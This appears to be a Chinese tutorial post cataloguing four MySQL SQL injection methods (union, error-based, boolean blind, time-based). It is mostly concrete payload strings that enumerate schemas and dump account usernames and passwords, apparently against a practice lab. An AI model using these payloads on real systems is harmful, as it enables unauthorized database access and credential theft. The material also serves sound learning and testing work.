sql注入之——mysql的四大注入基本注入手法

union类型的sql注入(联合查询注入)

  • 条件:
    页面必须有显示位
    判断列数
    1’ order by 3-- -
    不存在返回错误
    判断显示位:
    -1’ union select 1,2,3-- -
    查看数据库:
    -1’ union select user(),database(),version()-- -
    查看数据库有哪些表 (爆数据表)table_schema='数据库名’
    -1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3-- -
    查看对应表有哪些列 (爆字段)table_name='指定表名’
    -1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3-- -
    查看账号密码信息(数据拖库) username,password指定列,security.users指定库表
    -1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from security.users),3-- -
    数据脱库效果
    sql注入之——mysql的四大注入基本注入手法

基于错误显示的sql注入(报错注入)

  • 条件:
    必须有错误回显
    利用的函数
    1.updatexml(arg1,arg2,arg3)
    改变文档中符合条件的节点的值,arg1位xml文档对象的名称,arg2为xpath格式的字符串,arg3,String格式,替换查找到的符合条件的数据。
    语句:select updatexml(1,concat(0x7e,(select user()),0x7e),1)
    返回结果:XPATH syntax error: 'root@localhost
    2.extractvalue(arg1,arg2)
    从目标XML中返回包含所查询值的字符串,arg1为是String格式,为XML文档对象的名称。arg2为Xpath格式的字符串。
    语句:select extractvalue(1,concat(0x7e,(select user()),0x7e))
    返回结果:XPATH syntax error: 'root@localhost
    3.floor(arg1)
    函数只返回arg1整数部分,小数部分舍弃。
    语句:select 1,(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a),3
    返回结果:Duplicate entry ‘root@localhost1’ for key ‘group_key’
    4.注意
    Extractvalue() updatexml()有32位长度限制
    判断列数
    1’ order by 3-- -
    不存在时返回错误
    查看数据库
    -1 and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name) ,1,20)from information_schema.schemata)),1)
    bp抓包对substring第二个参数位置进行爆破(从哪开始截取)
    查看数据库有哪些表(爆数据表)
    -1 and updatexml(1,concat(0x7e,(select substring(group_concat(table_name) ,1,20)from information_schema.tables where table_schema=‘lp’)),1)
    bp抓包对substring第二个参数位置进行爆破(从哪开始截取)
    查看对应表有哪些列(爆字段)
    -1 and updatexml(1,concat(0x7e,(select substring(group_concat(column_name) ,1,20)from information_schema.columns where table_schema=‘lp’ and table_name=‘student’)),1)
    bp抓包对substring第二个参数位置进行爆破(从哪开始截取)
    查看账号密码信息(数据拖库)
    -1 and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,sno,class)) ,1,20)from lp.student)),1)
    bp抓包对substring第二个参数位置进行爆破(从哪开始截取)
    数据脱库效果
    sql注入之——mysql的四大注入基本注入手法

基于布尔类型的sql注入(布尔注入)

  • 条件:
    没有返回值和报错信息,根据当页面正常和不正常执行sql语句效果不同判断sql语句是否成功
    先得到数据库名的长度
    and (length(database()))>5
    and (length(database()))=4
    改变n的值依次获取数据库名的字符
    and (ascii(substr(database(),n,1)))>100
    获取数据库表名(先获取表名数量,再获取表名长度)
    and (select count(*) from information_schema.tables where table_schema=database())>5
    获取表名数量
    and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5
    获取表名长度
    and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1)))>100
    依次通过ascii码获取表名
    获取列名(先获取列名个数,再获取列名长度,最后获取列名)
    and (ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1)))>100
    获取数据
    and (ascii(substr(( select password from users limit 0,1),1,1)))=68
    注入效果
    sql注入之——mysql的四大注入基本注入手法

基于时间的sql注入(延时注入)

  • 条件:
    能执行sql语句
    利用的函数
    1.sleep,benchmark()
    通常与条件类函数配合使用
    2.sleep(arg1)
    arg1中断的时间单位为秒。
    语句:select if(1=1, sleep(3), ‘goodbye’)
    返回结果:页面延迟3秒显示
    3.benchmark(arg1,arg2)
    arg1为操作的函数,arg2为操作次数
    语句:
    select if(1=1, benchmark(5000000,md5(‘abc’)), ‘goodbye’)
    返回结果:
    页面延迟2秒显示
    先得到数据库名的长度
    and if((length(database()))>5),sleep(5),0)
    注:if(1,2,3)1为真执行2,否则执行3
    语句里if的第一个参数同布尔型语句,参考布尔型替换即可
    and if((length(database())>5),sleep(5),0)
    注入效果
    sql注入之——mysql的四大注入基本注入手法
上一篇:Servlet&JSP复习笔记 05


下一篇:Android应用闪退,W/dalvikvm: threadid=1: thread exiting with uncaught exception,无报错原因